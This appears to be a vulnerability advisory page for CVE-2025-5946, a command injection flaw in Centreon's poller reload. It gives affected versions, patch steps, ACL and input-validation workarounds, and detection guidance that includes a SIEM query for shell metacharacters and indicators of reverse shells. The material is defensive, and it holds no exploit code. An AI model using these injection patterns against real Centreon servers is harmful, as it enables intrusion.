CVE-2025-5946
📋 TL;DR
This OS command injection vulnerability in Centreon Infra Monitoring allows authenticated high-privilege users to inject arbitrary commands into poller reload operations. Attackers could execute system commands with the privileges of the Centreon web application, potentially leading to full system compromise. Affected versions include Centreon Infra Monitoring from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, and from 23.10.0 before 23.10.28.
💻 Affected Systems
- Centreon Infra Monitoring
📦 What is this software?
Centreon Web by Centreon
Centreon Web by Centreon
Centreon Web by Centreon
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise with root privileges, data exfiltration, lateral movement across network, and persistent backdoor installation.
Likely Case
Privilege escalation to execute arbitrary commands as the Centreon web user, potentially leading to service disruption and sensitive data access.
If Mitigated
Limited impact if proper network segmentation and least privilege principles are enforced, restricting lateral movement.
🎯 Exploit Status
Exploitation requires authenticated high-privilege access but is technically simple once access is obtained.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 24.10.13, 24.04.18, 23.10.28
Vendor Advisory: https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-5946-centreon-web-all-versions-high-severity-5104
Restart Required: Yes
Instructions:
1. Backup Centreon configuration and database. 2. Update to patched version via package manager (yum update centreon or apt upgrade centreon). 3. Restart Centreon services (systemctl restart centreon). 4. Verify version and functionality.
🔧 Temporary Workarounds
Restrict Poller Parameter Access
linuxTemporarily restrict access to poller parameters page to only essential administrators.
# Configure web server ACLs to restrict /centreon/main.php?p=60909
# Example for Apache: <Location "/centreon/main.php?p=60909">
Require ip 10.0.0.0/8
</Location>
Implement Input Validation
linuxAdd custom input validation for poller reload parameters to block command injection attempts.
# Add to Centreon configuration or custom validation script
# Validate poller parameters contain only alphanumeric characters
if [[ ! "$POLLER_PARAM" =~ ^[a-zA-Z0-9_-]+$ ]]; then
echo "Invalid input detected"
exit 1
fi
🧯 If You Can't Patch
- Implement strict network segmentation to isolate Centreon servers from critical systems
- Enforce least privilege principle for Centreon user accounts and monitor for suspicious activity
🔍 How to Verify
Check if Vulnerable:
Check Centreon version via web interface (Administration > About) or command: rpm -qa | grep centreon-webCheck Version:
rpm -qa | grep centreon-web || dpkg -l | grep centreon-webVerify Fix Applied:
Verify version is 24.10.13, 24.04.18, or 23.10.28 or higher. Test poller reload functionality works without allowing command injection.📡 Detection & Monitoring
Log Indicators:
- Unusual commands in Centreon poller logs
- Multiple poller reload attempts from single user
- Commands with shell metacharacters (;, |, &, $, etc.) in poller parameters
Network Indicators:
- Unexpected outbound connections from Centreon server
- SSH or reverse shell connections originating from Centreon process
SIEM Query:
source="centreon.log" AND ("poller reload" AND ("|" OR ";" OR "&" OR "$" OR "`"))